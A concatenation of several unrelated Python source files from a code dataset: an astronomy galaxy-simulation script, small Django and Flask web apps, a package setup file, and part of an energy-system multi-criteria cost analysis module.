These distributions are defined via priors -- the same objects that are used \r\nwhen defining the priors of each parameter for a non-linear search.\r\n\r\nBelow, we define the distributions the galaxy's bulge light is drawn from.\r\n\"\"\"\r\nbulge = af.Model(ag.lp_snr.Sersic)\r\n\r\nbulge.centre = (0.0, 0.0)\r\nbulge.ell_comps.ell_comps_0 = af.GaussianPrior(\r\n mean=0.0, sigma=0.2, lower_limit=-1.0, upper_limit=1.0\r\n)\r\nbulge.ell_comps.ell_comps_1 = af.GaussianPrior(\r\n mean=0.0, sigma=0.2, lower_limit=-1.0, upper_limit=1.0\r\n)\r\nbulge.signal_to_noise_ratio = af.UniformPrior(lower_limit=20.0, upper_limit=60.0)\r\nbulge.effective_radius = af.UniformPrior(lower_limit=1.0, upper_limit=5.0)\r\nbulge.sersic_index = af.GaussianPrior(\r\n mean=4.0, sigma=3.0, lower_limit=0.5, upper_limit=10.0\r\n)\r\n\r\ndisk = af.Model(ag.lp_snr.Sersic)\r\n\r\ndisk.centre = (0.0, 0.0)\r\ndisk.ell_comps.ell_comps_0 = af.GaussianPrior(\r\n mean=0.0, sigma=0.3, lower_limit=-1.0, upper_limit=1.0\r\n)\r\ndisk.ell_comps.ell_comps_1 = af.GaussianPrior(\r\n mean=0.0, sigma=0.3, lower_limit=-1.0, upper_limit=1.0\r\n)\r\ndisk.signal_to_noise_ratio = af.UniformPrior(lower_limit=20.0, upper_limit=60.0)\r\ndisk.effective_radius = af.GaussianPrior(\r\n mean=3.0, sigma=3.0, lower_limit=0.0, upper_limit=10.0\r\n)\r\n\r\ndisk.sersic_index = af.GaussianPrior(\r\n mean=1.0, sigma=1.0, lower_limit=0.5, upper_limit=10.0\r\n)\r\n\r\ngalaxy_model = af.Model(ag.Galaxy, redshift=0.5, bulge=bulge, disk=disk)\r\n\r\n\"\"\"\r\n__Sample Instances__\r\n\r\nWithin a for loop, we will now generate instances of each simulated galaxy using the `Model`'s defined above.\r\nThis loop will run for `total_datasets` iterations, which sets the number of galaxies that are simulated.\r\n\r\nEach iteration of the for loop creates a plane and use this to simulate the imaging dataset.\r\n\"\"\"\r\ntotal_datasets = 5\r\n\r\nfor sample_index in range(total_datasets):\r\n dataset_sample_path = path.join(dataset_path, f\"dataset_{sample_index}\")\r\n\r\n while True:\r\n try:\r\n galaxy = galaxy_model.random_instance()\r\n break\r\n except af.exc.PriorLimitException:\r\n continue\r\n\r\n \"\"\"\r\n __Plane__\r\n \r\n Use the sample's lens galaxies to setup a plane, which will generate the image for the \r\n simulated `Imaging` dataset.\r\n \r\n The steps below are expanded on in other `imaging/simulator` scripts, so check them out if anything below is unclear.\r\n \"\"\"\r\n plane = ag.Plane(galaxies=[galaxy])\r\n\r\n plane_plotter = aplt.PlanePlotter(plane=plane, grid=grid)\r\n plane_plotter.figures_2d(image=True)\r\n\r\n dataset = simulator.via_plane_from(plane=plane, grid=grid)\r\n\r\n dataset_plotter = aplt.ImagingPlotter(dataset=dataset)\r\n dataset_plotter.subplot_dataset()\r\n\r\n \"\"\"\r\n __Output__\r\n \r\n Output the simulated dataset to the dataset path as .fits files.\r\n \r\n This uses the updated `dataset_path_sample` which outputs this sample lens to a unique folder.\r\n \"\"\"\r\n dataset.output_to_fits(\r\n data_path=path.join(dataset_sample_path, \"data.fits\"),\r\n psf_path=path.join(dataset_sample_path, \"psf.fits\"),\r\n noise_map_path=path.join(dataset_sample_path, \"noise_map.fits\"),\r\n overwrite=True,\r\n )\r\n\r\n \"\"\"\r\n __Visualize__\r\n \r\n Output a subplot of the simulated dataset, the image and the plane's quantities to the dataset path as .png files.\r\n \"\"\"\r\n mat_plot = aplt.MatPlot2D(\r\n output=aplt.Output(path=dataset_sample_path, format=\"png\")\r\n )\r\n\r\n dataset_plotter = 
aplt.ImagingPlotter(dataset=dataset, mat_plot_2d=mat_plot)\r\n dataset_plotter.subplot_dataset()\r\n dataset_plotter.figures_2d(data=True)\r\n\r\n plane_plotter = aplt.PlanePlotter(plane=plane, grid=grid, mat_plot_2d=mat_plot)\r\n plane_plotter.subplot()\r\n\r\n \"\"\"\r\n __Plane Output__\r\n\r\n Save the `Plane` in the dataset folder as a .json file, ensuring the true light profiles and galaxies\r\n are safely stored and available to check how the dataset was simulated in the future. \r\n\r\n This can be loaded via the method `Plane.from_json`.\r\n \"\"\"\r\n plane.output_to_json(file_path=path.join(dataset_sample_path, \"plane.json\"))\r\n\r\n \"\"\"\r\n The dataset can be viewed in the \r\n folder `autogalaxy_workspace/imaging/sample/light_sersic_{sample_index]`.\r\n \"\"\"\r\n","sub_path":"scripts/imaging/simulators/samples/sersic_sersic.py","file_name":"sersic_sersic.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"324150562","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\n\nurl_lesson = r'^lesson/(?P\\d{4})-(?P\\d{1,2})-(?P\\d{1,2})/(?P\\d{3})/(?P\\d{1})/'\nurl_lesson_add = r'add/(?P\\d+)/(?P\\d{1})/'\nurl_lesson_del = r'delete/(?P\\d+)/'\nurl_end = r'$'\n\n\nurlpatterns = patterns('deproc.schedule.views',\n url(r'^$', 'index_now', name='schedule'),\n url(r'^choose/(?:(?P\\d+)/)?$', 'index', name='schedule_index'),\n url(url_lesson + url_end, 'lesson'),\n url(url_lesson + url_lesson_add + url_end, 'add_lesson'),\n url(url_lesson + url_lesson_del + url_end, 'delete_lesson')\n)","sub_path":"deproc/schedule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"416156473","text":"from flask import Flask, redirect\nimport logging\nimport sys\napp = Flask(__name__)\n\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.ERROR)\n\n\n@app.route('/')\ndef main():\n return redirect('/plot1')\n\n\n@app.route('/histogram_of_tweet_mentions_over_time')\ndef plot1():\n # return render_template('My_test_plot.html')\n hist_name = 'tweets_over_time.html'\n import os.path\n if not os.path.exists(hist_name):\n import challenge_q3\n challenge_q3.main()\n import codecs\n with codecs.open(hist_name) as f:\n html = f.read()\n return html\n\n\n@app.route('/tweet_mentions_on_the_world_map')\ndef plot2():\n map_name = 'tweets_locations.html'\n import os.path\n if not os.path.exists(map_name):\n import challenge_q3\n challenge_q3.main()\n import codecs\n with codecs.open(map_name) as f:\n html = f.read()\n return html\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=33507)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"545556595","text":"from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render_to_response\nfrom zaklad.models import Bet\n\n\ndef paginator(request, page_num=1):\n size = 2\n bets_list = Bet.objects.all().order_by('suspected_result')\n paginator = Paginator(bets_list, size)\n try:\n bets = paginator.page(page_num)\n except PageNotAnInteger:\n bets = paginator.page(1)\n except EmptyPage:\n bets = paginator.page(paginator.num_pages)\n return render_to_response('zaklad/print_page.html', {\n \"bets\": bets,\n \"page_num\": 
page_num,\n \"page_max\": paginator.num_pages\n })","sub_path":"krzysiowe/zaklad/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"131484529","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.1'\n\ntests_require = ['collective.testcaselayer','pysqlite']\n\nsetup(name='apyb.members',\n version=version,\n description=\"APyB Members participation app\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n ],\n keywords='Plone, APyB, Brazil',\n author='Ruda Porto Filgueiras',\n author_email='rudazz@gmail.com',\n url='https://github.com/apyb/apyb.members',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['apyb'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'zope.sqlalchemy',\n 'z3c.saconfig',\n 'plone.app.z3cform'\n # -*- Extra requirements: -*-\n ],\n tests_require=tests_require,\n extras_require={'tests': tests_require},\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"264014693","text":"\"\"\"\nMulti criteria decision analysis\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport cea.config\nimport cea.inputlocator\nfrom cea.optimization.lca_calculations import lca_calculations\nfrom cea.analysis.multicriteria.optimization_post_processing.electricity_imports_exports_script import electricity_import_and_exports\nfrom cea.technologies.solar.photovoltaic import calc_Cinv_pv\nfrom cea.optimization.constants import PUMP_ETA\nfrom cea.constants import DENSITY_OF_WATER_AT_60_DEGREES_KGPERM3\nfrom cea.optimization.constants import SIZING_MARGIN\nfrom cea.analysis.multicriteria.optimization_post_processing.individual_configuration import calc_opex_PV\nfrom cea.technologies.chiller_vapor_compression import calc_Cinv_VCC\nfrom cea.technologies.chiller_absorption import calc_Cinv\nfrom cea.technologies.cooling_tower import calc_Cinv_CT\nimport cea.optimization.distribution.network_opt_main as network_opt\nfrom cea.analysis.multicriteria.optimization_post_processing.locating_individuals_in_generation_script import locating_individuals_in_generation_script\nfrom cea.technologies.heat_exchangers import calc_Cinv_HEX\nfrom math import ceil, log\n\n\n__author__ = \"Sreepathi Bhargava Krishna\"\n__copyright__ = \"Copyright 2018, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Sreepathi Bhargava Krishna\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\ndef multi_criteria_main(locator, config):\n # local variables\n generation = config.multi_criteria.generations\n category = \"optimization-detailed\"\n if not os.path.exists(locator.get_address_of_individuals_of_a_generation(generation)):\n data_address = locating_individuals_in_generation_script(generation, locator)\n else:\n data_address = 
pd.read_csv(locator.get_address_of_individuals_of_a_generation(generation))\n\n # initialize class\n data_generation = preprocessing_generations_data(locator, generation)\n objectives = data_generation['final_generation']['population']\n individual_list = objectives.axes[0].values\n data_processed = preprocessing_cost_data(locator, data_generation['final_generation'], individual_list[0], generation, data_address, config)\n column_names = data_processed.columns.values\n\n compiled_data = pd.DataFrame(np.zeros([len(individual_list), len(column_names)]), columns=column_names)\n\n for i, individual in enumerate(individual_list):\n data_processed = preprocessing_cost_data(locator, data_generation['final_generation'], individual, generation, data_address, config)\n for name in column_names:\n compiled_data.loc[i][name] = data_processed[name][0]\n\n compiled_data = compiled_data.assign(individual=individual_list)\n\n normalized_TAC = (compiled_data['TAC_Mio'] - min(compiled_data['TAC_Mio'])) / (\n max(compiled_data['TAC_Mio']) - min(compiled_data['TAC_Mio']))\n normalized_emissions = (compiled_data['total_emissions_kiloton'] - min(compiled_data['total_emissions_kiloton'])) / (\n max(compiled_data['total_emissions_kiloton']) - min(compiled_data['total_emissions_kiloton']))\n normalized_prim = (compiled_data['total_prim_energy_TJ'] - min(compiled_data['total_prim_energy_TJ'])) / (\n max(compiled_data['total_prim_energy_TJ']) - min(compiled_data['total_prim_energy_TJ']))\n normalized_Capex_total = (compiled_data['Capex_total_Mio'] - min(compiled_data['Capex_total_Mio'])) / (\n max(compiled_data['Capex_total_Mio']) - min(compiled_data['Capex_total_Mio']))\n normalized_Opex = (compiled_data['Opex_total_Mio'] - min(compiled_data['Opex_total_Mio'])) / (\n max(compiled_data['Opex_total_Mio']) - min(compiled_data['Opex_total_Mio']))\n normalized_renewable_share = (compiled_data['renewable_share_electricity'] - min(compiled_data['renewable_share_electricity'])) / (\n max(compiled_data['renewable_share_electricity']) - min(compiled_data['renewable_share_electricity']))\n\n compiled_data = compiled_data.assign(normalized_TAC=normalized_TAC)\n compiled_data = compiled_data.assign(normalized_emissions=normalized_emissions)\n compiled_data = compiled_data.assign(normalized_prim=normalized_prim)\n compiled_data = compiled_data.assign(normalized_Capex_total=normalized_Capex_total)\n compiled_data = compiled_data.assign(normalized_Opex=normalized_Opex)\n compiled_data = compiled_data.assign(normalized_renewable_share=normalized_renewable_share)\n\n compiled_data['TAC_rank'] = compiled_data['normalized_TAC'].rank(ascending=True)\n compiled_data['emissions_rank'] = compiled_data['normalized_emissions'].rank(ascending=True)\n compiled_data['prim_rank'] = compiled_data['normalized_prim'].rank(ascending=True)\n\n # user defined mcda\n compiled_data['user_MCDA'] = compiled_data['normalized_Capex_total'] * config.multi_criteria.capextotal * config.multi_criteria.economicsustainability + \\\n compiled_data['normalized_Opex'] * config.multi_criteria.opex * config.multi_criteria.economicsustainability + \\\n compiled_data['normalized_TAC'] * config.multi_criteria.annualizedcosts * config.multi_criteria.economicsustainability + \\\n compiled_data['normalized_emissions'] *config.multi_criteria.emissions * config.multi_criteria.environmentalsustainability + \\\n compiled_data['normalized_prim'] *config.multi_criteria.primaryenergy * config.multi_criteria.environmentalsustainability + \\\n 
compiled_data['normalized_renewable_share'] * config.multi_criteria.renewableshare * config.multi_criteria.socialsustainability\n\n compiled_data['user_MCDA_rank'] = compiled_data['user_MCDA'].rank(ascending=True)\n\n compiled_data.to_csv(locator.get_multi_criteria_analysis(generation))\n\n return compiled_data\n\n\ndef preprocessing_generations_data(locator, generations):\n\n data_processed = []\n with open(locator.get_optimization_checkpoint(generations), \"rb\") as fp:\n data = json.load(fp)\n # get lists of data for performance values of the population\n costs_Mio = [round(objectives[0] / 1000000, 2) for objectives in\n data['population_fitness']] # convert to millions\n emissions_kiloton = [round(objectives[1] / 1000000, 2) for objectives in\n data['population_fitness']] # convert to tons x 10^3 (kiloton)\n prim_energy_TJ = [round(objectives[2] / 1000000, 2) for objectives in\n data['population_fitness']] # convert to gigajoules x 10^3 (Terajoules)\n individual_names = ['ind' + str(i) for i in range(len(costs_Mio))]\n\n df_population = pd.DataFrame({'Name': individual_names, 'costs_Mio': costs_Mio,\n 'emissions_kiloton': emissions_kiloton, 'prim_energy_TJ': prim_energy_TJ\n }).set_index(\"Name\")\n\n individual_barcode = [[str(ind) if type(ind) == float else str(ind) for ind in\n individual] for individual in data['population']]\n def_individual_barcode = pd.DataFrame({'Name': individual_names,\n 'individual_barcode': individual_barcode}).set_index(\"Name\")\n\n # get lists of data for performance values of the population (hall_of_fame\n costs_Mio_HOF = [round(objectives[0] / 1000000, 2) for objectives in\n data['halloffame_fitness']] # convert to millions\n emissions_kiloton_HOF = [round(objectives[1] / 1000000, 2) for objectives in\n data['halloffame_fitness']] # convert to tons x 10^3\n prim_energy_TJ_HOF = [round(objectives[2] / 1000000, 2) for objectives in\n data['halloffame_fitness']] # convert to gigajoules x 10^3\n individual_names_HOF = ['ind' + str(i) for i in range(len(costs_Mio_HOF))]\n df_halloffame = pd.DataFrame({'Name': individual_names_HOF, 'costs_Mio': costs_Mio_HOF,\n 'emissions_kiloton': emissions_kiloton_HOF,\n 'prim_energy_TJ': prim_energy_TJ_HOF}).set_index(\"Name\")\n\n # get dataframe with capacity installed per individual\n for i, individual in enumerate(individual_names):\n dict_capacities = data['capacities'][i]\n dict_network = data['disconnected_capacities'][i][\"network\"]\n list_dict_disc_capacities = data['disconnected_capacities'][i][\"disconnected_capacity\"]\n for building, dict_disconnected in enumerate(list_dict_disc_capacities):\n if building == 0:\n df_disc_capacities = pd.DataFrame(dict_disconnected, index=[dict_disconnected['building_name']])\n else:\n df_disc_capacities = df_disc_capacities.append(\n pd.DataFrame(dict_disconnected, index=[dict_disconnected['building_name']]))\n df_disc_capacities = df_disc_capacities.set_index('building_name')\n dict_disc_capacities = df_disc_capacities.sum(axis=0).to_dict() # series with sum of capacities\n\n if i == 0:\n df_disc_capacities_final = pd.DataFrame(dict_disc_capacities, index=[individual])\n df_capacities = pd.DataFrame(dict_capacities, index=[individual])\n df_network = pd.DataFrame({\"network\": dict_network}, index=[individual])\n else:\n df_capacities = df_capacities.append(pd.DataFrame(dict_capacities, index=[individual]))\n df_network = df_network.append(pd.DataFrame({\"network\": dict_network}, index=[individual]))\n df_disc_capacities_final = df_disc_capacities_final.append(\n 
pd.DataFrame(dict_disc_capacities, index=[individual]))\n\n data_processed.append(\n {'population': df_population, 'halloffame': df_halloffame, 'capacities_W': df_capacities,\n 'disconnected_capacities_W': df_disc_capacities_final, 'network': df_network,\n 'spread': data['spread'], 'euclidean_distance': data['euclidean_distance'],\n 'individual_barcode': def_individual_barcode})\n\n return {'all_generations': data_processed, 'final_generation': data_processed[-1:][0]}\n\ndef preprocessing_cost_data(locator, data_raw, individual, generations, data_address, config):\n\n string_network = data_raw['network'].loc[individual].values[0]\n total_demand = pd.read_csv(locator.get_total_demand())\n building_names = total_demand.Name.values\n individual_barcode_list = data_raw['individual_barcode'].loc[individual].values[0]\n\n # The current structure of CEA has the following columns saved, in future, this will be slightly changed and\n # correspondingly these columns_of_saved_files needs to be changed\n columns_of_saved_files = ['CHP/Furnace', 'CHP/Furnace Share', 'Base Boiler',\n 'Base Boiler Share', 'Peak Boiler', 'Peak Boiler Share',\n 'Heating Lake', 'Heating Lake Share', 'Heating Sewage', 'Heating Sewage Share', 'GHP',\n 'GHP Share',\n 'Data Centre', 'Compressed Air', 'PV', 'PV Area Share', 'PVT', 'PVT Area Share', 'SC_ET',\n 'SC_ET Area Share', 'SC_FP', 'SC_FP Area Share', 'DHN Temperature', 'DHN unit configuration',\n 'Lake Cooling', 'Lake Cooling Share', 'VCC Cooling', 'VCC Cooling Share',\n 'Absorption Chiller', 'Absorption Chiller Share', 'Storage', 'Storage Share',\n 'DCN Temperature', 'DCN unit configuration']\n for i in building_names: # DHN\n columns_of_saved_files.append(str(i) + ' DHN')\n\n for i in building_names: # DCN\n columns_of_saved_files.append(str(i) + ' DCN')\n\n df_current_individual = pd.DataFrame(np.zeros(shape = (1, len(columns_of_saved_files))), columns=columns_of_saved_files)\n for i, ind in enumerate((columns_of_saved_files)):\n df_current_individual[ind] = individual_barcode_list[i]\n\n data_address = data_address[data_address['individual_list'] == individual]\n\n generation_number = data_address['generation_number_address'].values[0]\n individual_number = data_address['individual_number_address'].values[0]\n # get data about the activation patterns of these buildings (main units)\n\n if config.multi_criteria.network_type == 'DH':\n building_demands_df = pd.read_csv(locator.get_optimization_network_results_summary(string_network)).set_index(\n \"DATE\")\n data_activation_path = os.path.join(\n locator.get_optimization_slave_heating_activation_pattern(individual_number, generation_number))\n df_heating = pd.read_csv(data_activation_path).set_index(\"DATE\")\n\n data_activation_path = os.path.join(\n locator.get_optimization_slave_electricity_activation_pattern_heating(individual_number, generation_number))\n df_electricity = pd.read_csv(data_activation_path).set_index(\"DATE\")\n\n # get data about the activation patterns of these buildings (storage)\n data_storage_path = os.path.join(\n locator.get_optimization_slave_storage_operation_data(individual_number, generation_number))\n df_SO = pd.read_csv(data_storage_path).set_index(\"DATE\")\n\n # join into one database\n data_processed = df_heating.join(df_electricity).join(df_SO).join(building_demands_df)\n\n elif config.multi_criteria.network_type == 'DC':\n\n data_costs = pd.read_csv(os.path.join(locator.get_optimization_slave_investment_cost_detailed_cooling(individual_number, generation_number)))\n data_cooling = 
pd.read_csv(os.path.join(locator.get_optimization_slave_cooling_activation_pattern(individual_number, generation_number)))\n data_electricity = pd.read_csv(os.path.join(locator.get_optimization_slave_electricity_activation_pattern_cooling(individual_number, generation_number)))\n data_emissions = pd.read_csv(os.path.join(locator.get_optimization_slave_investment_cost_detailed(individual_number, generation_number)))\n\n # Total CAPEX calculations\n # Absorption Chiller\n Absorption_chiller_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"Absorption_chiller\",\n usecols=['type', 'code', 'cap_min', 'cap_max', 'a', 'b', 'c', 'd', 'e', 'IR_%',\n 'LT_yr', 'O&M_%'])\n Absorption_chiller_cost_data = Absorption_chiller_cost_data[Absorption_chiller_cost_data['type'] == 'double']\n max_ACH_chiller_size = max(Absorption_chiller_cost_data['cap_max'].values)\n Inv_IR = (Absorption_chiller_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = Absorption_chiller_cost_data.iloc[0]['LT_yr']\n Q_ACH_max_W = data_cooling['Q_from_ACH_W'].max()\n Q_ACH_max_W = Q_ACH_max_W * (1 + SIZING_MARGIN)\n number_of_ACH_chillers = max(int(ceil(Q_ACH_max_W / max_ACH_chiller_size)) , 1)\n Q_nom_ACH_W = Q_ACH_max_W / number_of_ACH_chillers\n Capex_a_ACH, Opex_fixed_ACH = calc_Cinv(Q_nom_ACH_W, locator, 'double', config)\n Capex_total_ACH = (Capex_a_ACH * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_ACH_chillers\n data_costs['Capex_total_ACH'] = Capex_total_ACH\n data_costs['Opex_total_ACH'] = np.sum(data_cooling['Opex_var_ACH']) + data_costs['Opex_fixed_ACH']\n\n # VCC\n VCC_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"Chiller\")\n VCC_cost_data = VCC_cost_data[VCC_cost_data['code'] == 'CH3']\n max_VCC_chiller_size = max(VCC_cost_data['cap_max'].values)\n Inv_IR = (VCC_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = VCC_cost_data.iloc[0]['LT_yr']\n Q_VCC_max_W = data_cooling['Q_from_VCC_W'].max()\n Q_VCC_max_W = Q_VCC_max_W * (1 + SIZING_MARGIN)\n number_of_VCC_chillers = max(int(ceil(Q_VCC_max_W / max_VCC_chiller_size)), 1)\n Q_nom_VCC_W = Q_VCC_max_W / number_of_VCC_chillers\n Capex_a_VCC, Opex_fixed_VCC = calc_Cinv_VCC(Q_nom_VCC_W, locator, config, 'CH3')\n Capex_total_VCC = (Capex_a_VCC * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_VCC_chillers\n data_costs['Capex_total_VCC'] = Capex_total_VCC\n data_costs['Opex_total_VCC'] = np.sum(data_cooling['Opex_var_VCC']) + data_costs['Opex_fixed_VCC']\n\n # VCC Backup\n Q_VCC_backup_max_W = data_cooling['Q_from_VCC_backup_W'].max()\n Q_VCC_backup_max_W = Q_VCC_backup_max_W * (1 + SIZING_MARGIN)\n number_of_VCC_backup_chillers = max(int(ceil(Q_VCC_backup_max_W / max_VCC_chiller_size)), 1)\n Q_nom_VCC_backup_W = Q_VCC_backup_max_W / number_of_VCC_backup_chillers\n Capex_a_VCC_backup, Opex_fixed_VCC_backup = calc_Cinv_VCC(Q_nom_VCC_backup_W, locator, config, 'CH3')\n Capex_total_VCC_backup = (Capex_a_VCC_backup * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_VCC_backup_chillers\n data_costs['Capex_total_VCC_backup'] = Capex_total_VCC_backup\n data_costs['Opex_total_VCC_backup'] = np.sum(data_cooling['Opex_var_VCC_backup']) + data_costs['Opex_fixed_VCC_backup']\n\n # Storage Tank\n storage_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"TES\")\n storage_cost_data = storage_cost_data[storage_cost_data['code'] == 'TES2']\n Inv_IR = (storage_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = 
storage_cost_data.iloc[0]['LT_yr']\n Capex_a_storage_tank = data_costs['Capex_a_Tank'][0]\n Capex_total_storage_tank = (Capex_a_storage_tank * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_storage_tank'] = Capex_total_storage_tank\n data_costs['Opex_total_storage_tank'] = np.sum(data_cooling['Opex_var_VCC_backup']) + data_costs['Opex_fixed_Tank']\n\n # Cooling Tower\n CT_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"CT\")\n CT_cost_data = CT_cost_data[CT_cost_data['code'] == 'CT1']\n max_CT_size = max(CT_cost_data['cap_max'].values)\n Inv_IR = (CT_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = CT_cost_data.iloc[0]['LT_yr']\n Qc_CT_max_W = data_cooling['Qc_CT_associated_with_all_chillers_W'].max()\n number_of_CT = max(int(ceil(Qc_CT_max_W / max_CT_size)), 1)\n Qnom_CT_W = Qc_CT_max_W/number_of_CT\n Capex_a_CT, Opex_fixed_CT = calc_Cinv_CT(Qnom_CT_W, locator, config, 'CT1')\n Capex_total_CT = (Capex_a_CT * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT) * number_of_CT\n data_costs['Capex_total_CT'] = Capex_total_CT\n data_costs['Opex_total_CT'] = np.sum(data_cooling['Opex_var_CT']) + data_costs['Opex_fixed_CT']\n\n # CCGT\n CCGT_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"CCGT\")\n technology_code = list(set(CCGT_cost_data['code']))\n CCGT_cost_data = CCGT_cost_data[CCGT_cost_data['code'] == technology_code[0]]\n Inv_IR = (CCGT_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = CCGT_cost_data.iloc[0]['LT_yr']\n Capex_a_CCGT = data_costs['Capex_a_CCGT'][0]\n Capex_total_CCGT = (Capex_a_CCGT * ((1 + Inv_IR) ** Inv_LT - 1) / (Inv_IR) * (1 + Inv_IR) ** Inv_LT)\n data_costs['Capex_total_CCGT'] = Capex_total_CCGT\n data_costs['Opex_total_CCGT'] = np.sum(data_cooling['Opex_var_CCGT']) + data_costs['Opex_fixed_CCGT']\n\n # pump\n config.restricted_to = None # FIXME: remove this later\n config.thermal_network.network_type = config.multi_criteria.network_type\n config.thermal_network.network_names = []\n network_features = network_opt.network_opt_main(config, locator)\n DCN_barcode = \"\"\n for name in building_names:\n DCN_barcode += str(df_current_individual[name + ' DCN'][0])\n if df_current_individual['Data Centre'][0] == 1:\n df = pd.read_csv(locator.get_optimization_network_data_folder(\"Network_summary_result_\" + hex(int(str(DCN_barcode), 2)) + \".csv\"),\n usecols=[\"mdot_cool_space_cooling_and_refrigeration_netw_all_kgpers\"])\n else:\n df = pd.read_csv(locator.get_optimization_network_data_folder(\"Network_summary_result_\" + hex(int(str(DCN_barcode), 2)) + \".csv\"),\n usecols=[\"mdot_cool_space_cooling_data_center_and_refrigeration_netw_all_kgpers\"])\n mdotA_kgpers = np.array(df)\n mdotnMax_kgpers = np.amax(mdotA_kgpers)\n deltaPmax = np.max((network_features.DeltaP_DCN) * DCN_barcode.count(\"1\") / len(DCN_barcode))\n E_pumping_required_W = mdotnMax_kgpers * deltaPmax / DENSITY_OF_WATER_AT_60_DEGREES_KGPERM3\n P_motor_tot_W = E_pumping_required_W / PUMP_ETA # electricty to run the motor\n Pump_max_kW = 375.0\n Pump_min_kW = 0.5\n nPumps = int(np.ceil(P_motor_tot_W / 1000.0 / Pump_max_kW))\n # if the nominal load (electric) > 375kW, a new pump is installed\n Pump_Array_W = np.zeros((nPumps))\n Pump_Remain_W = P_motor_tot_W\n Capex_total_pumps = 0\n Capex_a_total_pumps = 0\n for pump_i in range(nPumps):\n # calculate pump nominal capacity\n Pump_Array_W[pump_i] = min(Pump_Remain_W, Pump_max_kW * 1000)\n if Pump_Array_W[pump_i] < Pump_min_kW * 1000:\n 
Pump_Array_W[pump_i] = Pump_min_kW * 1000\n Pump_Remain_W -= Pump_Array_W[pump_i]\n pump_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname=\"Pump\")\n pump_cost_data = pump_cost_data[pump_cost_data['code'] == 'PU1']\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if Pump_Array_W[pump_i] < pump_cost_data.iloc[0]['cap_min']:\n Pump_Array_W[pump_i] = pump_cost_data.iloc[0]['cap_min']\n pump_cost_data = pump_cost_data[\n (pump_cost_data['cap_min'] <= Pump_Array_W[pump_i]) & (\n pump_cost_data['cap_max'] > Pump_Array_W[pump_i])]\n Inv_a = pump_cost_data.iloc[0]['a']\n Inv_b = pump_cost_data.iloc[0]['b']\n Inv_c = pump_cost_data.iloc[0]['c']\n Inv_d = pump_cost_data.iloc[0]['d']\n Inv_e = pump_cost_data.iloc[0]['e']\n Inv_IR = (pump_cost_data.iloc[0]['IR_%']) / 100\n Inv_LT = pump_cost_data.iloc[0]['LT_yr']\n Inv_OM = pump_cost_data.iloc[0]['O&M_%'] / 100\n InvC = Inv_a + Inv_b * (Pump_Array_W[pump_i]) ** Inv_c + (Inv_d + Inv_e * Pump_Array_W[pump_i]) * log(\n Pump_Array_W[pump_i])\n Capex_total_pumps += InvC\n Capex_a_total_pumps += InvC * (Inv_IR) * (1 + Inv_IR) ** Inv_LT / ((1 + Inv_IR) ** Inv_LT - 1)\n data_costs['Capex_total_pumps'] = Capex_total_pumps\n data_costs['Opex_total_pumps'] = data_costs['Opex_fixed_pump'] + data_costs['Opex_fixed_pump']\n\n # Lake - No lake in singapore, should be modified in future\n data_costs['Opex_fixed_Lake'] = [0]\n data_costs['Opex_total_Lake'] = [0]\n data_costs['Capex_total_Lake'] = [0]\n data_costs['Capex_a_Lake'] = [0]\n\n\n # PV\n pv_installed_area = data_electricity['Area_PV_m2'].max()\n Capex_a_PV, Opex_fixed_PV = calc_Cinv_pv(pv_installed_area, locator, config)\n pv_annual_production_kWh = (data_electricity['E_PV_W'].sum()) / 1000\n 